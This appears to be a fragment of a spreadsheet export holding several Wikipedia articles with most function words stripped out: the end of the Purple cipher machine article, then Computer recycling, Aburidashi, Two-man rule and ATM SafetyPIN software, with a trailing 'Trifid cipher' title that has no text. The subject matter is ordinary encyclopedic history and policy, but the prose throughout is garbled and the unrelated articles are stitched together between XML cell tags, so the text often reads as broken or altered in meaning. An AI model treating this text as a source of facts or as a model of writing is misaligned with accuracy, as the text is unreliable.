japanese text introduction early japanese version phillips code.knowing plaintext letters scattered throughout message sometimes enabled parts rest message guessed, especially writing highly stylized. some diplomatic messages included text letters u.s. government japanese government. english text messages could usually obtained. some diplomatic stations type especially early introduction, sometimes message sent type type cipher, broken. provided cribs attacking twenties cipher. william friedman assigned lead group cryptographers attacking system august 1939.: even cribs, progress difficult. permutations used twenties cipher "brilliantly" chosen, according friedman, became clear periodicities would unlikely discovered waiting enough traffic encrypted single indicator, since plugboard alphabets changed daily. cryptographers developed transform messages sent different days indicator homologous messages would appear sent day. this provided enough traffic based identical settings messages indicator 59173) chance finding periodicity would reveal inner workings twenties cipher. september 1940 genevieve grotjan, carrying work sheets walked group engrossed conversation politely attempted frank rowlett's attention. found evidence cycles twenties cipher. celebration ensued first break cipher soon enabled replica machine built.: pair messages using indicator 59173 decrypted september, coincidentally date tripartite agreement nazi germany, italy, japan announced. there still work recover meaning possible indicators. october 1940, third indicator settings recovered.: from time time japanese instituted operating procedures strengthen type system, often described messages diplomatic outputs older system, giving americans warning.: reconstruction purple machine based ideas larry clark. advances understanding purple keying procedures made francis raven, usn. after initial break, raven discovered japanese divided month three 10-days periods, and, within period, used keys first day, small, predictable changes.the japanese believed type unbreakable throughout war, even time war, even though informed otherwise germans. april 1941, hans thomsen, diplomat german embassy washington, d.c., sent message joachim ribbentrop, german foreign minister, informing absolutely reliable source" told thomsen americans broken japanese diplomatic cipher (that purple). that source apparently konstantin umansky, soviet ambassador deduced leak based upon communications u.s. undersecretary state sumner welles. message duly forwarded japanese; code continued. american analogs built first machine could decrypt purple messages late 1940. second purple analog built navy. third sent england january 1941 king george brought ambassador halifax u.s. that purple analog accompanied team four american cryptologists, army, navy, received information british successes german ciphers exchange. this machine subsequently sent singapore, japanese moves south malaya, india. fourth purple analog sent philippines fifth kept sis. sixth, originally intended hawaii, sent england there.: p.23 purple intercepts proved important european theater detailed reports german plans sent cipher japanese ambassador berlin. fragmentary recovery japanese machines united states obtained portions purple machine japanese embassy germany following germany's defeat 1945 (see image above) discovered japanese used stepping switch almost identical construction rosen chosen building duplicate purple analog machine) washington 1939 1940. stepping switch uniselector; standard component used large quantities automatic telephone exchanges countries like america, britain, canada, germany japan, extensive dial-telephone systems. u.s. used four 6-level switches stage purple analogs, japanese used three 7-level switches. both represented cipher identically. note however two-motion strowger switches sometimes claimed: twenty-five strolger-type (sic) stepper switches ...apparently, purple machines japanese embassies consulates around world (e.g. axis countries, washington, london, moscow, neutral countries) japan itself, destroyed ground small particles japanese. american occupation troops japan 1945−52 searched remaining units. complete jade cipher machine, built similar principles without sixes twenties separation, captured display nsa's national cryptologic museum. impact allied decryption purple machine first used japan june 1938, american british cryptanalysts broken messages well attack pearl harbor. cryptanalysts decrypted translated japan's 14-part message washington embassy break negotiations united states p.m., washington time, december 1941, japanese embassy washington done decryption typing difficulties embassy, coupled ignorance importance time, major reasons "nomura note" delivered late. during world japanese ambassador nazi germany, general hiroshi oshima, well-informed german military affairs. reports went tokyo purple-enciphered radio messages. comment hitler told june 1941 every probability russia cannot avoided." july august 1942, toured eastern front, 1944, toured atlantic wall fortifications invasion along coasts france belgium. september, hitler told germany would strike west, probably november.since messages read allies, provided valuable intelligence german military preparations forthcoming invasion western europe. described general george marshall "our main basis information regarding hitler's intentions europe."the decrypted purple traffic japanese messages generally subject acrimonious hearings congress world connection attempt decide who, anyone, allowed attack pearl harbor happen blamed. hearings japanese first time learned purple cipher machine indeed broken. (see pearl harbor advance-knowledge conspiracy theory article additional detail controversy investigations.) soviets also succeeded breaking purple system late 1941, together reports richard sorge, learned japan going attack soviet union. instead, targets southward, toward southeast asia american british interests there. that allowed stalin move considerable forces east moscow time help stop german push moscow december. references further reading machines, stephen kelley (aegean park press, walnut creek, 2001, isbn 0-89412-290-8) contains lengthy, technically detailed description history creation purple machine, along breaking sis, analysis cryptographic security flaws budiansky, stephen (2000). battle wits: complete story codebreaking world york: free press. 351-353. isbn 0-684-85932-7. appendix cryptanalysis purple machine clark, ronald "the broke purple: life colonel william friedman, deciphered japanese code world ii", september 1977, little brown isbn 0-316-14595-5. freeman, wes; sullivan, geoff; weierud, frode (2003). "purple revealed: simulation computer-aided cryptanalysis angooki taipu cryptologia. (1): 1–43. doi:10.1080/0161-110391891739. s2cid 12776919. combined fleet decoded prados story magic: memoirs american cryptologic pioneer, frank rowlett (aegean park press, laguna hills, 1998, isbn 0-89412-273-8) first-hand memoir lead team member team 'broke' purple, contains detailed descriptions 'breaks' smith, michael (2000). emperor's codes: bletchley park breaking japan's secret ciphers. london: bantam press. isbn 0593-046412. smith, michael (2000). emperor's codes: breaking japan's secret ciphers. york: arcade publishing. isbn 9781559705684. lee, bruce. (1995). marching orders: untold story world york: crown publishers inc. isbn 9780517575765. external links japanese wikipedia article type machine much technical information including substitution tables, detailed stepping algorithm, punctuation codes sample decryption. also reactions japanese sources american decryption. entering website link https://ja.wikipedia.org/wiki/パープル暗号 google translate clicking "translate page" provide serviceable english translation. purple: story retold analysts' modern-day attempt duplicate solving purple ciphers. cryptologic quarterly article (nsa), fall/winter 1984-1985 vol. nos. (last accessed: august 2016). web-based purple simulator (last accessed: february 2019) purple machine simulator written python purple machine simulator written java purple, coral, jade purple machine information simulator (for windows).</t>
  </si>
  <si>
    <t>Computer recycling</t>
  </si>
  <si>
    <t>computer recycling, electronic recycling e-waste recycling disassembly separation components materials waste electronics. although procedures re-use, donation repair strictly recycling, common sustainable ways dispose waste. 2009, computers quarter total electronic waste recycled united states, years prior respectively. since inception early 1990s, devices recycled worldwide increased awareness investment. electronic recycling occurs primarily order recover valuable rare earth metals precious metals, short supply, well plastics metals. these resold used devices purification, effect creating circular economy. such processes involve specialised facilities premises, within home ordinary workplace, sound components damaged obsolete computers often reused, reducing replacement costs. recycling considered environmentally friendly prevents hazardous waste, including heavy metals carcinogens, entering atmosphere, landfill waterways. while electronics consist small fraction total waste generated, dangerous. there stringent legislation designed enforce encourage sustainable disposal appliances, notable waste electrical electronic equipment directive european union united states national computer recycling act. reasons recycling obsolete computers electronics valuable sources secondary materials recycled; otherwise, devices source toxins carcinogens. rapid technology change, initial cost, planned obsolescence resulted fast-growing surplus computers electronic components around globe. technical solutions available, cases legal framework, collection system, logistics, services need implemented applying technical solution. u.s. environmental protection agency, estimates million surplus pcs, classified "hazardous household waste", would ready end-of-life management next years. u.s. national safety council estimates personal computers ever sold surplus electronics.in 2007, united states environmental protection agency (epa) stated million computers u.s. traded replacements discarded. today, electronic devices equipment recycled united states. most electronic waste sent landfills incinerated, releases materials lead, mercury, cadmium soil, groundwater, atmosphere, thus negative impact environment. many materials used computer hardware recovered recycling future production. reuse tin, silicon, iron, aluminium, variety plastics present bulk computers electronics reduce costs constructing systems. components frequently contain copper, gold, tantalum, silver, platinum, palladium, lead well valuable materials suitable reclamation.computer components contain many toxic substances, like dioxins, polychlorinated biphenyls (pcbs), cadmium, chromium, radioactive isotopes mercury. typical computer monitor contain lead weight, much lead glass cathode tube (crt). typical inch computer monitor contain pounds lead monitors estimated pounds lead. circuit boards contain considerable quantities lead-tin solders likely leach groundwater create pollution incineration. landfills, lead content levels e-waste. processing (e.g. incineration acid treatments) required reclaim precious substances release, generate, synthesize toxic byproducts. export waste countries lower environmental standards major concern. basel convention includes hazardous wastes limited screens item exported transcontinentally without prior consent country exporting receiving waste. companies find cost-effective short term sell outdated computers less developed countries regulations. commonly believed majority surplus laptops routed developing nations. high value working reusable laptops, computers, components (e.g. ram) help cost transportation many worthless commodities. laws governing exportation waste electronics place govern recycling companies developed countries ship waste third world countries. however, concerns impact e-recycling human health, health recycling workers environmental degradation remain. example, lack strict regulations developing countries, sometimes workers smash products, propelling toxins ground, contaminating soil putting wear shoes danger. other procedures include burning away wire insulation acid baths resell circuit boards. these methods pose environmental health hazards, toxins released acid bath residue enter water supply. regulations europe switzerland, first electronic waste recycling system implemented 1991, beginning collection refrigerators; years, electric electronic devices gradually added system. established producer responsibility organization swico, mainly handling information, communication, organization technology. european union implemented similar system february 2003, waste electrical electronic equipment directive (weee directive, 2002/96/ec).pan-european adoption legislation slow take-up, italy united kingdom final member states pass law. success weee directive varied significantly state state, collection rates varying kilograms capita annum little capita annum. computers electronic wastes collected households within europe treated weee directive producer compliance schemes (whereby manufacturers electronics scheme funds recovery household waste recycling centres (hwrcs)) nominated waste treatment facilities (known obligated weee). however, recycling corporate computer hardware associated electronic equipment falls outside producer compliance scheme (known non-obligated). waste obsolete corporate related computer hardware treated third party authorized treatment facilities, normally impose charge collection treatment. since 2020 classification weee changed regards pops (persistent organic pollutants). weee containing pops classified hazardous waste, includes printed circuit boards, cable weee categories 1,2,3,6,7 (cat unless evidence provided contrary). united states federal united states congress considers number electronic waste bills, like national computer recycling introduced congressman mike thompson (d-ca). main federal governing solid waste resource conservation recovery 1976. covers crts, though state regulations differ. there also separate laws concerning battery disposal. march 2009, house science technology committee approved funding research reducing electronic waste mitigating environmental impact, regarded sponsor ralph hall (r-tx) first federal bill directly address electronic waste. state many states introduced legislation concerning recycling reuse computers computer parts electronics. most american computer recycling legislations address within larger electronic waste issue. 2001, arkansas enacted arkansas computer electronic solid waste management act, requires state agencies manage sell surplus computer equipment, establishes computer electronics recycling fund, authorizes department environmental quality regulate and/or disposal computer electronic equipment arkansas landfills.the recently passed electronic device recycling research development distributes grants universities, government labs private industries research developing projects line e-waste recycling refurbishment. asia japan, sellers manufacturers certain electronics (such televisions conditioners) required recycle them. this covered least legislations: promotion effective utilization resources (lpur); and, recycling specified kinds home appliances (lrha). former, passed 2001, encouraged manufacturers voluntarily help recycle goods lrha, adopted 2009, required recycling efforts consumers manufacturers home appliances. however, legislation exists cover recycling computer cellphone-related wastes.it required south korea taiwan sellers manufacturers electronics responsible recycling used products. south korea, local governments introduced recycling initiatives case seoul, launched specialized e-waste recycling program. this includes center recycling facility, takes apart salvages materials fifth 10-ton e-waste city generates year.according report unep titled, "recycling e-waste resources," amount e-waste produced including mobile phones computers could rise much percent next decade countries, india. theory increased regulation electronic waste concern environmental harm mature economies creates economic disincentive remove residues prior export. critics trade used electronics maintain easy brokers calling recyclers export unscreened electronic waste developing countries, china, india parts africa, thus avoiding expense removing items like cathode tubes (the processing expensive difficult). developing countries becoming dump yards e-waste. proponents international trade point success fair trade programs industries, cooperation creation sustainable jobs, bring affordable technology countries repair reuse rates higher. organizations like group stepped responsibility collect recycle e-waste various locations india. south africa thanks national environmental management 1998 national environmental management waste 2008, person position causing harm environment failing comply waste could fined million jail receive penalties transgressions. recycling methods consumer recycling consumer recycling options consists (see below) sale, donating computers directly organizations need, sending devices directly back original manufacturers, getting components convenient recycler refurbisher. scrapping recycling recycling process, tvs, monitors, mobile phones computers typically tested reuse repaired. broken, disassembled parts still high value labour cheap enough. other e-waste shredded roughly pieces manually checked separate toxic batteries capacitors contain poisonous metals. remaining pieces shredded passed magnet remove ferrous metals. eddy current ejects non-ferrous metals, sorted density either centrifuge vibrating plates. precious metals dissolved acid, sorted, smelted ingots. remaining glass plastic fractions separated density sold re-processors. monitors must manually disassembled remove either toxic lead crts mercury flat screens.corporations face risks incompletely destroyed data improperly disposed computers. recycling companies specialized weee-registered contractor dispose equipment electrical appliances, disposes safely legally. america, companies liable compliance regulations even recycling process outsourced resource conservation recovery act. companies mitigate risks requiring waivers liability, audit trails, certificates data destruction, signed confidentiality agreements, random audits information security. national association information destruction international trade association data destruction providers. sale online auctions alternative consumers willing resell cash less fees, complicated, self-managed, competitive environment paid listings might sell. online classified similarly risky forgery scams uncertainty. take back when researching computer companies computer purchase, consumers find offer recycling services. most major computer manufacturers offer form recycling. user's request mail computers, arrange pickup manufacturer. hewlett-packard also offers free recycling, "national" recycling programs available nationally, rather specific states. hewlett-packard also offers pick computer product brand fee, offer coupon purchase future computers components; largest computer recycler america 2003, recycled 750,000,000 pounds (340,000,000 electronic waste globally since 1995. encourages shared approach collection points consumers recyclers meet. exchange manufacturers often offer free replacement service purchasing example, dell computers apple inc. take back products buys one. both refurbish resell computers one-year warranty.many companies purchase recycle brands working broken laptops notebook computers individuals corporations. building market recycling desktop computers proven difficult exchange programs laptops, smartphones smaller electronics. basic business model provide seller instant online quote based laptop characteristics, send shipping label prepaid seller, erase, reformat, process laptop, rapidly cheque. majority companies also generalized electronic waste recyclers well; organizations recycle computers exclusively include cash laptops, laptop refurbisher nevada claims first laptops online, 2001. donations/nonprofits with constant rising costs inflation, many families schools sufficient funds available computers utilized along education standards. families also impacted disaster suffer well financial impact situation incurred. many nonprofit organizations, interconnection.org, found locally well around give detailed descriptions methods used dissemination detailed instructions donate. impact seen locally globally, affecting thousands need. canada profit organizations engaged computer recycling, electronic recycling association calgary, edmonton, vancouver, winnipeg, toronto, montreal, computers schools canada wide, active collecting refurbishing computers laptops help profit charitable sectors schools. junkyard computing term junkyard computing colloquial expression using inferior hardware fulfill computational tasks handling reliability availability software level. utilizes abstraction computational resources software, allowing hardware replacement effort. ease replacement hereby corner point since hardware failures expected time condition underlying infrastructure. this paradigm became widely used introduction cluster orchestration software like kubernetes apache mesos, since large monolithic applications require reliability availability machine level whereas kind software fault tolerant design. those orchestration tools also introduced fairly fast set-up processes allowing junkyard computing economically even making pattern applicable first place. further cases introduced continuous delivery getting widely accepted. infrastructure execute tests static code analysis needed requires much performance possible extremely cost effective. from economical technological perspective, junkyard computing practicable small number users companies. already requires decent number physical machines compensate hardware failures maintaining required reliability availability. this implies direct need matching underling infrastructure house computers servers. scaling paradigm also quite limited increasing importance factors like power efficiency maintenance efforts, making kind computing perfect mid-sized applications. history although consumer electronics radio popular since 1920s, recycling almost unheard early 1990s. 1970s, accelerating pace domestic consumer electronics drastically shortened lifespan electronics tvs, vcrs audio. innovations appeared quickly, making older equipment considered obsolete. increased complexity sophistication manufacture made local repair difficult. retail market shifted gradually, substantially, high-value items cherished years repaired necessary, short-lived items rapidly replaced owing wear simply fashion, discarded rather repaired. this particularly evident computing, highlighted moore's law. 1988 severe incidents highlighted approaching e-waste crisis. cargo barge khian sea, loaded 14,000 tons toxic pennsylvania refused acceptance jersey caribbean. after sailing months, waste dumped "topsoil fertiliser" haiti bengal november 1988. june 1988, large illegal toxic waste dump created italian company discovered. this formation basel convention stem flow poisonous substances developed countries 1989.in 1991, first electronic waste recycling system implemented switzerland, beginning collection refrigerators gradually expanding cover devices. organisation swico handles programme, partnership retailers.the first publication report recycling computers electronic waste published front page york times april 1993 columnist steve lohr. detailed work advanced recovery inc., small recycler, trying safely dismantle computers, even waste landfilled. several companies emerged early 1990s, chiefly europe, national 'take back' laws compelled retailers them. after schemes many countries capacity deal sheer quantity e-waste generated hazardous nature. they began export problem developing countries without enforced environmental legislation. this cheaper: cost recycling computer monitors times china. demand asia electronic waste began grow scrap yards found could extract valuable substances copper, iron, silicon, nickel gold, recycling process.the waste electrical electronic equipment directive (weee directive) became european february 2003 covers aspects recycling types appliance. this followed electronic waste recycling act, enshrined californian january 2005 2000s large increase sale electronic devices growth waste stream: 2002 e-waste grew faster type waste this caused investment modern, automated facilities cope influx redundant appliances. e-cycling e-cycling "e-waste" initiative united states environmental protection agency (epa) refers donations, reuse, shredding general collection used electronics. generically, term refers process collecting, brokering, disassembling, repairing recycling components metals contained used discarded electronic equipment, otherwise known electronic waste (e-waste). "e-cyclable" items include, limited televisions, computers, microwave ovens, vacuum cleaners, telephones cellular phones, stereos, vcrs dvds anything cord, light takes kind battery.investment e-cycling facilities increasing recently technology's rapid rate obsolescence, concern improper methods, opportunities manufacturers influence secondary market (used reused products). higher metal prices result recycling taking place. controversy around methods stems lack agreement preferred outcomes. world markets lower disposable incomes, consider repair reuse valuable enough justify disposal. debate certification standards leading better definitions, though civil contracts, governing expected process still vital contracted process, poorly defined "e-cycling". pros e-cycling e-waste disposal occurring processing reuse, repair equipment, recovery metals unethical illegal e-scrap many kinds transported overseas developing countries processing. transported repaired and/or recycled, processing less valuable e-scrap becomes e-waste/pollution there. another point view environmental cost must compared include mining, refining extraction waste pollution cost products manufactured replace secondary products routinely destroyed wealthier nations, cannot economically repaired older obsolete products. example negative impacts e-waste, pollution groundwater become serious areas surrounding china's landfills water must shipped miles away. however, mining metals even broader impacts groundwater. either thorough e-cycling processing, domestic processing overseas repair, help environment avoiding pollution. such e-cycling theoretically sustainable alternative disposing e-waste landfills. addition, e-cycling allows reclamation potential conflict minerals, like gold wolframite, requires less mined lessens potential money flow militias exploitative actors third-world profit mining them. supporters form "required e-cycling" legislation argue e-cycling saves taxpayers money, financial responsibility would shifted taxpayer manufacturers. advocates simple legislation (such landfill bans e-waste) argue involving manufacturers reduce cost consumers, reuse value lost, resulting costs passed consumers products, particularly affecting markets hardly afford products. theorized manufacturers take part e-cycling would motivated fewer materials production process, create longer lasting products, implement safer, efficient recycling systems. this theory sharply disputed never demonstrated. criticisms e-cycling critics e-cycling vocal advocates. according reason foundation, e-cycling raises product waste management costs e-waste consumers limits innovation part high-tech companies. they also believe e-cycling facilities could unintentionally cause great harm environment. critics claim e-waste occupy significant portion total waste. another opposition e-cycling many problems posed disassembly: process costly dangerous heavy metals electronic products composed, little 1–5% original cost materials retrieved. final problem people find identity fraud common regards disposal electronic products. programs legislated, creating winners losers among e-cyclers different locations processes, difficult distinguish criticism e-cycling practice, criticism specific legislated means proposed enhance fate e-waste hefty criticism often lobbed reuse based recyclers people think recycling electronic waste, reality actually exported developing countries like china, india, nigeria. instance, free recycling drives, "recyclers" staying true word, selling e-waste overseas parts brokers. studies indicate 50–80% 300,000 400,000 tons (270,000 360,000 tonnes) e-waste sent overseas, approximately million tons (1.8 million tonnes) year u.s. landfills.although possible circumstances, best e-cycle upcycle e-waste. hand, electronic products question generally manufactured, repaired warranty, nations, anti-reuse recyclers depict primitive. reuse-based e-recyclers believe fair-trade incentives export markets lead better results domestic shredding. there continued debate export-friendly e-cycling increased regulation practice.in european union, debate regarding export e-waste resulted significant amendment weee directive (january 2012) view significantly diminishing export weee (untreated e-waste). during debate strasburg, meps stated million tonnes weee generated 2009 collected recycling" remainder exported sent landfill. amendment, voted unanimous representatives, removed re-use (repair refurbishmet) aspect directive placed emphasis upon recycling recovery precious metals base metals. changes went placing burden upon registered exporters prove used equipment leaving europe "fit purpose". policy issues current efforts currently, pieces government legislation number grassroots efforts contributed growth e-cycling processes emphasize decreased exports increased reuse rates. electronic waste recycling passed california 2003. requires consumers extra certain types electronics, collected money redistributed recycling companies qualified properly recycle products. state legislates e-waste kind consumer fee; states' efforts focus producer responsibility laws waste disposal bans. study shown capita recovery greater type legislated program (e.g. california) versus ordinary waste disposal bans (e.g. massachusetts), though recovery greatly increased states either method. september, 2006, dell developed nation's first completely free recycling program, furthering responsibilities manufacturers taking e-cycling. manufacturers retailers best buy, sony, samsung also recycling programs. this program accept televisions, expensive used electronic item, unpopular markets must deal televisions valuable computers cherry picked. another step taken recyclers’ pledge true stewardship, sponsored computer takeback campaign. signed numerous recyclers promising recycle responsibly. grassroots efforts also played part issue, community organizations formed help responsibly recycle e-waste. other grassroots campaigns basel, computer takeback campaign (co-coordinated grassroots recycling network), silicon valley toxics coalition. study shown difference recycling methods pledge, data available demonstrate difference management "pledge" non-pledge companies, though assumed risk making false claims prevent pledge companies wrongly describing processes. many people believe u.s. follow european union model regards management e-waste, extended producer responsibility, started sweden 1990. program, directive forces manufacturers take responsibility e-cycling; also demands manufacturers' mandatory take-back places bans exporting e-waste developing countries. british columbia programs recycling regulation legislation, stops e-waste landfills recycles instead. there programs canada 2013.another longer-term solution computers composed less dangerous products many people disagree. data provided show people agree european model based agreement measured outcomes experience-based scientific method. data security e-waste presents potential security threat individuals exporting countries. hard drives properly erased computer disposed reopened, exposing sensitive information. credit card numbers, private financial data, account information records online transactions accessed willing individuals. organized criminals ghana commonly search drives information local scams.government contracts discovered hard drives found agbogbloshie, ghana. multimillion-dollar agreements united states security institutions defense intelligence agency (dia), transportation security administration homeland security resurfaced agbogbloshie. reasons destroy recycle securely there ways ensure hardware destroyed also private data hard drive. having customer data stolen, lost, misplaced contributes ever-growing number people affected identity theft, cause corporations lose money. image company holds secure data, banks, firms, pharmaceuticals, credit corporations also risk. company's public image hurt, could cause consumers services could cost millions business losses positive public relation campaigns. cost data breaches "varies widely, ranging $50,000 (under hipaa's hitech amendment, came american recovery revitalization 2009), customer record, depending whether breach “low-profile” “high-profile” company non-regulated highly regulated area, banking medical institutions.”there also major backlash consumer data breach company supposed trusted protect private information. organization consumer info file, must (red flags clarification 2010) written information protection policies procedures place, serve combat, mitigate, detect vulnerable areas could result identity theft. united states department defense published standard recyclers individuals meet order satisfy hipaa requirements. secure recycling countries developed standards, aimed businesses purpose ensuring security data contained 'confidential' computer media [nist 800-88: standard data remanence][hmg cesg is5, baseline enhanced, government protocol data destruction]. national association information destruction (naid) international trade association companies providing information destruction services. suppliers products, equipment services destruction companies also eligible membership. naid's mission promote information destruction industry standards ethics member companies." there companies follow guidelines naid also meet federal local regulations. typical process computer recycling aims securely destroy hard drives still recycling byproduct. typical process effective computer recycling: receive hardware destruction locked securely transported vehicles. shred hard drives. separate aluminum waste metals electromagnet. collect securely deliver shredded remains aluminum recycling plant. mold remaining hard drive parts aluminum ingots.the asset disposal information security alliance (adisa) publishes adisa asset disposal security standard covers phases e-waste disposal process collection transportation, storage sanitization's disposal facility. also conducts periodic audits disposal vendors. also appliance recycling mobile phone recycling references external links european commission circular economy package 2015 recycling from e-waste resources environmental program, 2009, pages) weee directive (u.k.) weee directive (e.c.) computer donation locations (u.s.)</t>
  </si>
  <si>
    <t>Aburidashi</t>
  </si>
  <si>
    <t>aburidashi ninja technique sending secret messages using form invisible ink. technique uses made juice extracted soaked crushed soybeans. message becomes visible recipient heating paper. references</t>
  </si>
  <si>
    <t>Two-man rule</t>
  </si>
  <si>
    <t>two-man rule control mechanism designed achieve high level security especially critical material operations. under rule access actions require presence authorized people times. united states: nuclear weapons force instruction (afi) 91-104, "the two-person concept" designed prevent accidental malicious launch nuclear weapons single individual.in case minuteman missile launch crews, launch order received, operators must agree valid comparing authorization code order sealed authenticator special sealed envelope containing verification code). these sealed authenticators stored safe separate locks. each operator lock, neither open safe alone. also, operator launch keys; order verified, must insert keys slots control panel turn simultaneously. precaution, slots launch keys positioned enough apart make impossible operator reach once. additional protection, missile crew another launch control center must missiles launched. total four keys thus required initiate launch. submarine, commanding officer executive officer must agree order launch valid mutually authorize launch operations personnel. instead another party would confirm missile launch case land-based icbms, third officer weapons officer must also confirm launch. addition, keys distributed among personnel submarine keys kept safes (each crew members access keys). some keys stored special safes board secured combination locks. nobody board combination open safes; unlock comes part launch order (emergency action message) higher authority.journalist rosenbaum pointed that, order issued, process entirely concerned authenticating identity commanding officers authenticity order, safeguards verify order person issuing actually sane. notably, major harold hering discharged force asking question, "how know order receive launch missiles came sane president?"the two-man rule applies missile silos submarines; check president's sole authority order nuclear launch. cryptographic material two-person integrity (tpi) security measure taken prevent single-person access comsec keying material cryptographic manuals. accomplished follows: constant presence authorized persons comsec material handled; combination locks security containers used store comsec material; locking devices physical barrier equipment.at time person possession combinations keys gain lone access security container cryptographic equipment containing comsec material. neither person sole possession comsec material requires security. no-lone zone no-lone zone area must staffed qualified cleared individuals times. individuals must maintain visual contact component(s) require no-lone-zone area designation. such zone contain cryptographic component, weapon system hardware test, nuclear weapon, active weapon controls, critical information devices. united states force (usaf) policy concerning critical weapons, no-lone zone area entry single unaccompanied individual prohibited. two-person concept requires presence least individuals knowledgeable task(s) performed; addition, individual must capable detecting incorrect unauthorized procedure part others regarding task(s). other uses two-man rule used safety critical applications presence people required potentially hazardous operation performed. this common safety practice example, laboratories machine shops. context, additional security less important fact individual injured call help. another example, firefighters operating hazardous environment (i.e., interior structure fire, hazmat zone, also known idlh, "immediately dangerous life health") function team least personnel. there commonly team environment, team operates unit. dual keys require authorization separate parties particular action taken. simplest form dual security lock requires keys open, held different person. lock opened parties agree time. 1963, canada accepted american w-40 nuclear warheads dual control canadian soil, used canadian bomarc missiles. similarly, many banks implement variant two-man rule secure large sums money valuable items. under concept, unlocking vault requires individuals different keys vault secured lock system. bank vaults secured combination locks, employees given portion combination. none knows entire combination, must physically present order open vault. extension broader rationale "two-man rule", regulations companies not-for-profit organizations require signatures executives checks. these rules make harder individual acting alone defraud organization. some software systems enforce two-man rule whereby certain actions (for example, funds wire transfers) take place approved authorized users. this helps prevent expensive errors, makes difficult commit fraud embezzlement. while requirements common financial systems, also used controls critical infrastructure, nuclear reactors electrical power generation, dangerous operations, biohazard research facilities. finally, testimony witnesses valuable various situations deter wrongful false accusation one, prove wrongful occurred. correctional facilities inmates given "two rule" designation, means minimum correctional officers must utilized move particular inmate, primarily disciplinary reasons possible officer safety issues. civilian aircraft late march 2015 many civil aviation authorities and/or airlines made cockpits aircraft flight mandatory "two-man" "no-lone zones" result germanwings flight 9525 crash. early investigation crash, believed cockpit voice recorder audio, later supported flight data recorder information, co-pilot deliberately crashed aircraft locking cockpit door captain left toilet. popular culture film hunt october, captain ramius takes dead political officer's missile key, fellow officer, ship's doctor, requests key, using two-man rule reason, saying, "the reason missile keys missiles." two-man rule crucial movie crimson tide captain executive officer alabama disagreed release nuclear weapons. clancy novel fears, president robert fowler jack ryan, deputy director central intelligence agency, authorized issue nuclear launch order city thought harboring terrorist leader. ryan refused validate launch order nuclear attack aborted. ryan serving second secretary defense killed terrorist attack. movie version, ryan analyst, second secretary state sidney owens. film wargames, two-man missile crew receives verifies order launch, refuses turn launch even threatens shoot him. unknown them, attack simulation; incident well significant rate similar refusals among missile crews) sets basis movie, department defense puts missile launch system fully automatic control prevent future refusal launch. similar wargames, computer game command conquer: alert officer pulls second officer given command launch nuclear missiles. however, disagreement, direct mind control. star trek franchise depicts two-man rule similar variations critical situations, often concerning arming cancelling ship's self-destruct mechanism (except star trek: voyager captain's authorization required). some variants require authorization three senior officers (the original star trek episode "let that your last battlefield", star trek iii: search spock, star trek: first contact), others commanding executive officers (star trek: next generation episodes "11001001" "where silence lease", star trek: deep space nine episode "the adversary"). depictions include voice authorization officers involved, two-man variant also involved hand print identification. movie, honey production ordered halted, workers simultaneously turn ignition keys unlock shutdown button. torch freedom eric flint, nuclear self-destruct device important installation requires least people activate. nonetheless, person gains access necessary codes able activate device. first episode series last resort, marcus chaplin kendal, captain respectively, perform two-man launch procedure, prior questioning attack order. after, united states initiates counterattack soviet union. this includes complete two-person lgm-30 minuteman missile launch sequence taken earlier movie first strike. pixar's inside animation movie, father's personified emotions initiate punishment riley's misbehavior using two-man rule system trigger "putting foot down". "solitude" episode series supergirl, villain indigo kills silo personnel take keys, stretches arms turn keys time, launching nuclear missile intended destroy national city. goldeneye eponymous attack satellite fired severnaya cuba sites. also buddy system fail-deadly permissive action link (pal) separation duties shamir's secret sharing references generalu.s. national park service article minuteman missile launch control centers, details operation u.s. nuclear weapons recovery manual reference two-man rule</t>
  </si>
  <si>
    <t>ATM SafetyPIN software</t>
  </si>
  <si>
    <t>safetypin software software application would allow users automated teller machines (atms) alert enforcement forced cash withdrawal (such robbery) entering personal identification number (pin) reverse order. system patented illinois lawyer joseph zingher (u.s. patent 5,731,575). safetypin currently used systems, despite widely circulated rumors originating chain letter e-mail, mainly issues regarding reversible pins incompatible system potential security vulnerabilities could arise implemented. history concept backup emergency system, duress code, systems around since least july 1986, representative mario biaggi, former police officer, proposed u.s. congressional record, 18232 seq. biaggi proposed house resolution 1987 would track problem express kidnappings evaluate idea emergency system. hr785 died committee without debate. zingher successful marketing licenses patent. police york, jersey, ohio, illinois, kansas supported concept. police support prompted illinois legislature pass making mandatory atms illinois. changed shortly passed "follow-on" bill changed meaning exact opposite seeking.in 2006, e-mail chain letter hoax circulated claimed reverse duress code system place universally. american banker reported january 2007 pin-reversal duress code used date. september 2013 hoax still circulating australia text: ever forced robber withdraw money atm, notify police entering reverse. example 1234 would 4321. recognizes backwards card placed machine. machine still give money requested, unknown robber, police immediately dispatched help you. this information recently broadcast states seldom used people know exists. please pass along everyone possible. australian federal police. site: http://www.afp.gov.au kind e-mail chain letter hoax still circulated tumblr facebook, well india parts world. were system implemented, palindromic pins 5555 2112 would unavailable false alarms would occur. moreover, pins semi-reversible 5255 1241, first last numbers same, would something avoid well accidental alarms would triggered mistakenly switching middle numbers. diebold, manufacturer atms, states website emergency alerting system currently use. they cite article louis post-dispatch claims bankers oppose reverse-pin system concerns "atm users might hesitate fumble trying enter pins backwards duress, possibly increasing chances violence." diebold states would willing support technology customers (presumably banks) request it.a bill making reverse emergency system mandatory atms state illinois proposed february 2009. subsection bill. terminal operated state must designed programmed consumer enters personal identification number reverse order, terminal automatically sends alarm local enforcement agency jurisdiction terminal location. commissioner shall promulgate rules necessary implementation subsection (i). 2009, angeles city councilman greig smith announced intention make reversepin system mandatory atms city. references external links snopes.com: reverse panic code number reversal reverse contact police? urban legends security advise message enter reverse call police number reverse outlook express tips</t>
  </si>
  <si>
    <t>Trifid cipher</t>
  </si>
  <si>
